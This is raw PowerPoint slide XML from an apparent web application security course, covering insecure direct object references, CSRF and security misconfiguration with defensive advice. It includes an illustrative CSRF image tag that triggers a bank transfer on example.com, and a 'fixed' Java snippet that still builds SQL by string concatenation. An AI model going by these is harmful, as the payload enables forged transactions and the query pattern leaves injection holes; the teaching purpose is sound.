            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Preventing Insecure Direct Object Reference</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1143000"/>
            <a:ext cx="8458200" cy="5181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Verify authorization to all referenced objects</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http://www.example.com/updateCart.jsp?cartid=123</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try {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pP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cartID</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Integer.parseInt</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request.getParameter</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cartID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>" ) );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>} catch (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>NumberFormatException</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> e) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>// Do error handling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>User </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = (User)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>request.getSession</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>().</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>getAttribute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>( "user" );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>String query = "SELECT * FROM table WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cartID</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cartID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> + " </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>userID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>user.getID</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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">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Apply the principle of least privileges</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30</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29318004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A5. Cross Site Request Forgery (CSRF)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="914400"/>
            <a:ext cx="8458200" cy="5181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A CSRF attack forces a logged-on victim’s browser to send a pre-authenticated request to a vulnerable web application, which then forces the victim’s browser to perform a hostile action to the benefit of the attacker. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>User should be logged on to the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Application does not perform authorization checks based on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>on</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-going sessions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Authorizes requests based only on automatically submitted credentials like session cookie or the “remember me” functionality</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Social engineering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>One-Click Attack, Cross Reference Forgery, Session Riding attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>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31</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14193447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CSRF Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1143000"/>
            <a:ext cx="8610600" cy="5181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CSRF attack takes the form of directing the user to invoke some function</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Imagine a logged in user of the application receives the following requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>img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src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>"http://www.example.com/transfer.do?frmAcct=document.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>form.frmAcct&amp;toAcct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=4345754&amp;toSWIFTid=434343&amp;amt=3434”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>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32</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77909568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CSRF</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="990600"/>
            <a:ext cx="8458200" cy="5181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Insert random tokens into every form and URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;form action="/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>transfer.do</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>" method="post"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;input type="hidden" name=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>csrfToken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>" value="856c2f50ddc49fd710f14a406ec1fef652d3c9f"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;/form&gt;</a:t>
            </a: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Should be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>unique per user (or one user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>can use their crumb to attack another)</a:t>
            </a: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use sha1(salt + user’s session ID + timestamp) as the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>csrfToken</a:t>
            </a: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33</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15310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0"/>
            <a:ext cx="7010400" cy="715963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Preventing CSRF</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1143000"/>
            <a:ext cx="8458200" cy="5181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Do not use GET requests (URLs) for sensitive data or to perform value transactions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>However, the URL may contain the random token as this creates a unique URL, which makes CSRF almost impossible to perform</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>For sensitive data or value transactions, re-authenticate or use transaction signing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:defRPr/>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HTTP Referrer header can be spoofed, checking the Referrer is a good practice to detect hacking attempts and acts as a deterrent factor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000"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7A1601AE-3AB5-4580-9556-3C20AF0CA3B8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>34</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141574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A6 –Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Misconfiguration</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solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Default accounts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Unused pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Unpatched</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> systems, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Unprotected files and directories</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35</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20033471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84576"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A repeatable hardening</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Patch management process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A strong application/network architecture providing good separation and security between components.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Periodic scans and audits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="76200" y="0"/>
            <a:ext cx="70104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latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Preventing Security </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
